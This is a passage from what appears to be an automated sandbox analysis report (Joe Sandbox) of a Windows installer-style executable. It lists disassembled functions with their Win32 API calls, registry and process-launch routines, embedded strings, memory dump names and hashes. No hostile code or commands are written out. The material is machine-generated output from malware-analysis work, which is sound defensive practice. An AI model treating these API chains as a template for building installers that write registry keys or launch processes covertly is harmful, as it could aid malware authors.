                                                    • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                    • SetCursor.USER32(00000000), ref: 004042F6
                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                    • String ID: @%F$N$open
                                                    • API String ID: 3928313111-3849437375
                                                    • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                    • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                    • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                    • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                    APIs
                                                    • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                    • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                    • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                      • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                      • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                    • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                    • wsprintfA.USER32 ref: 00406B4D
                                                    • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                    • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                      • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                      • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                    • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                    • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                    • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                    • String ID: F$%s=%s$NUL$[Rename]
                                                    • API String ID: 565278875-1653569448
                                                    • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                    • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                    • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                    • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                    APIs
                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                    • DeleteObject.GDI32(?), ref: 004010F6
                                                    • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                    • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                    • SelectObject.GDI32(00000000,?), ref: 00401149
                                                    • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                    • DeleteObject.GDI32(?), ref: 0040116E
                                                    • EndPaint.USER32(?,?), ref: 00401177
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                    • String ID: F
                                                    • API String ID: 941294808-1304234792
                                                    • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                    • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                    • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                    • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                    APIs
                                                    • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                    • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                    • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                    • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                    Strings
                                                    • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                    • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                    • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                    • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                    • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                    • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: lstrlen$CloseCreateValuewvsprintf
                                                    • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                    • API String ID: 1641139501-220328614
                                                    • Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                    • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                                    • Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                    • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                    APIs
                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                    • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                    • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                    • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                    • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                    • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                    Strings
                                                    • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                    • String ID: created uninstaller: %d, "%s"
                                                    • API String ID: 3294113728-3145124454
                                                    • Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                    • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                    • Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                    • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                    APIs
                                                    • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                    • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                    • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                    • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                    • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                    • String ID: RMDir: RemoveDirectory invalid input("")
                                                    • API String ID: 3734993849-2769509956
                                                    • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                    • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                    • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                    • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                    APIs
                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                    • GetSysColor.USER32(00000000), ref: 00403E00
                                                    • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                    • SetBkMode.GDI32(?,?), ref: 00403E18
                                                    • GetSysColor.USER32(?), ref: 00403E2B
                                                    • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                    • DeleteObject.GDI32(?), ref: 00403E55
                                                    • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                    • String ID:
                                                    • API String ID: 2320649405-0
                                                    • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                    • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                    • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                    • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                    • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                    • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                    Strings
                                                    • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                    • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                    • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                    • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                    • API String ID: 1033533793-945480824
                                                    • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                    • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                    • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                    • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                    APIs
                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                      • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                      • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                    • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                    • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                    Strings
                                                    • Exec: command="%s", xrefs: 00402241
                                                    • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                    • Exec: success ("%s"), xrefs: 00402263
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                    • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                    • API String ID: 2014279497-3433828417
                                                    • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                    • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                    • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                    • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                    APIs
                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                    • GetMessagePos.USER32 ref: 00404871
                                                    • ScreenToClient.USER32(?,?), ref: 00404889
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: Message$Send$ClientScreen
                                                    • String ID: f
                                                    • API String ID: 41195575-1993550816
                                                    • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                    • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                    • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                    • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                    APIs
                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                    • MulDiv.KERNEL32(0000E000,00000064,?), ref: 00403295
                                                    • wsprintfW.USER32 ref: 004032A5
                                                    • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                    Strings
                                                    • verifying installer: %d%%, xrefs: 0040329F
                                                    Memory Dump Source
